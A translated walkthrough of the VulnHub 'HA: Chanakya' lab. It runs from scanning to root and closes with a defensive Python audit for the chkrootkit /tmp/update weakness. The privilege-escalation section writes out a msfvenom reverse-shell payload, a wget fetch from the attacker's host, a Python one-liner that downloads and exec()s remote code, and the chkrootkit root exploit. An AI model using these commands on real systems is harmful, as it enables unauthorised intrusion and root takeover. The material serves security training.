chanakya
For personal entertainment only
Reference: http://www.saulgoodman.cn/HA-Chanakya.html
Target machine info
https://www.vulnhub.com/entry/ha-chanakya,395/
I. Host discovery
arp-scan -l
![](https://upload-images.jianshu.io/upload_images/4664072-a5bbb87e8b3c10d4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
nmap -sV -p 1-65535 -A 192.168.236.136
![](https://upload-images.jianshu.io/upload_images/4664072-a00285317f4ae63e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
dirb http://192.168.236.136
![](https://upload-images.jianshu.io/upload_images/4664072-978be0a74e20927e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-97cef97bb0f615c1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-a63cd5372f1ae1ab.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-58a5a0b9f966100b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ce363fce39d758a1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-1dcae495ea67689c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
II. Finding and exploiting the vulnerability
A Baidu search identified the encoding as ROT13.
![](https://upload-images.jianshu.io/upload_images/4664072-39a2c1600392454e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
The pcap capture can simply be downloaded.
![](https://upload-images.jianshu.io/upload_images/4664072-962e0604efb99fa3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-9ba25d60ec49f703.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
ashoka kautilya
First, log in on port 21 (FTP).
![](https://upload-images.jianshu.io/upload_images/4664072-42f9e04068e8861a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Login on port 22 (SSH) failed.
![](https://upload-images.jianshu.io/upload_images/4664072-c84e8388e744372d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Create a key pair with ssh-keygen
Upload .ssh so Kali can log in without a password
ssh-keygen
![](https://upload-images.jianshu.io/upload_images/4664072-38ab6939691c2e8b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Then redirect the contents of id_rsa.pub into the authorized_keys file
root@kali:~/桌面# cd ~/.ssh
root@kali:~/.ssh# cat id_rsa.pub > authorized_keys
![](https://upload-images.jianshu.io/upload_images/4664072-2f1f4da8cfa78658.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
mkdir .ssh
cd .ssh
put authorized_keys
![](https://upload-images.jianshu.io/upload_images/4664072-2ee3b7dd414aa82c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
root@kali:~/.ssh# ssh ashoka@192.168.236.136
![](https://upload-images.jianshu.io/upload_images/4664072-3ed2b1969f5dfb45.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Privilege escalation
First, generate a payload with msf and get a meterpreter session back
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.236.129 LPORT=4444 -f elf > shell.elf
![](https://upload-images.jianshu.io/upload_images/4664072-4034f7e0235e0d91.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
python -m SimpleHTTPServer
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.236.129
![](https://upload-images.jianshu.io/upload_images/4664072-55c5d07e9925e605.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
cd /tmp
wget http://192.168.236.129:8000/shell.elf
![](https://upload-images.jianshu.io/upload_images/4664072-6e2644a4ac65a0b8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-6a3421b509aa29f3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
sysinfo
Use a post module to see which privilege-escalation exploits could be used:
run post/multi/recon/local_exploit_suggester
![](https://upload-images.jianshu.io/upload_images/4664072-c03c87f6a0994a54.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
info exploit/linux/local/netfilter_priv_esc_ipv4
![](https://upload-images.jianshu.io/upload_images/4664072-5a4e4ea390f16303.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-eb521c01df0b0fbf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Failed
Use command injection to get a reverse shell:
use exploit/multi/script/web_delivery
![](https://upload-images.jianshu.io/upload_images/4664072-fb26c2e3252f1502.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
set lhost 192.168.236.129
![](https://upload-images.jianshu.io/upload_images/4664072-3307115f74d1cfce.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.236.129:8080/m9eTnBmiM');exec(r.read());"
Run on the target:
![](https://upload-images.jianshu.io/upload_images/4664072-e9dbb96ea2fc1137.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Use the rootkit attack module:
![](https://upload-images.jianshu.io/upload_images/4664072-617a47c6520ed61d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
This module exploits a chkrootkit flaw: chkrootkit has a crontab entry and periodically executes the /tmp/update file as root.
set rhosts 192.168.236.136
set session 1
set lport 8888
exploit
python -c 'import pty;pty.spawn("/bin/bash")'
![](https://upload-images.jianshu.io/upload_images/4664072-9f339371eb3378d4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-3ade2781ebeba734.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
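As an added defensive check (not part of the original write-up or of the Metasploit module), the Python below audits the condition described above: a chkrootkit cron entry combined with an /tmp/update file that a non-root user could create or modify. The crontab text and the scratch "update" file are constructed samples; on a real host you would run audit_update_file("/tmp/update") and feed it the actual cron files.

```python
import os
import stat
import tempfile

# Constructed sample crontab text (not from the target machine) showing the
# pattern described in the write-up: chkrootkit scheduled to run as root.
SAMPLE_CRON = """# m h dom mon dow user command
0 * * * * root /usr/sbin/chkrootkit
30 2 * * * root /usr/bin/apt-get update -q
"""

def chkrootkit_cron_entries(cron_text):
    """Return the non-comment cron lines that invoke chkrootkit."""
    return [line for line in cron_text.splitlines()
            if line.strip() and not line.lstrip().startswith("#")
            and "chkrootkit" in line]

def audit_update_file(path):
    """Return findings for a file that a root cron job would execute.

    The weak condition from the write-up is a file under /tmp that a
    non-root user can create or modify and that is later run as root.
    """
    findings = []
    parent = os.path.dirname(path)
    if os.path.isdir(parent):
        pmode = os.stat(parent).st_mode
        # /tmp normally has the sticky bit; without it any user can replace files
        if pmode & stat.S_IWOTH and not pmode & stat.S_ISVTX:
            findings.append("parent directory world-writable without sticky bit")
    if not os.path.lexists(path):
        return findings  # nothing planted, nothing to run
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        findings.append("path is a symlink")
    if st.st_uid != 0:
        findings.append("not owned by root (uid %d)" % st.st_uid)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("writable by group or others")
    return findings

def demo():
    """Plant a sample 'update' script in a scratch directory and audit it."""
    with tempfile.TemporaryDirectory() as scratch:
        target = os.path.join(scratch, "update")
        with open(target, "w") as fh:
            fh.write("#!/bin/sh\necho planted\n")
        os.chmod(target, 0o777)  # deliberately loose permissions for the demo
        return audit_update_file(target)
```

Any non-empty result from audit_update_file on a file a root cron job runs is worth an alert; the durable fix is to stop executing anything from a world-writable directory as root.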
Reference article: http://www.saulgoodman.cn/HA-Chanakya.html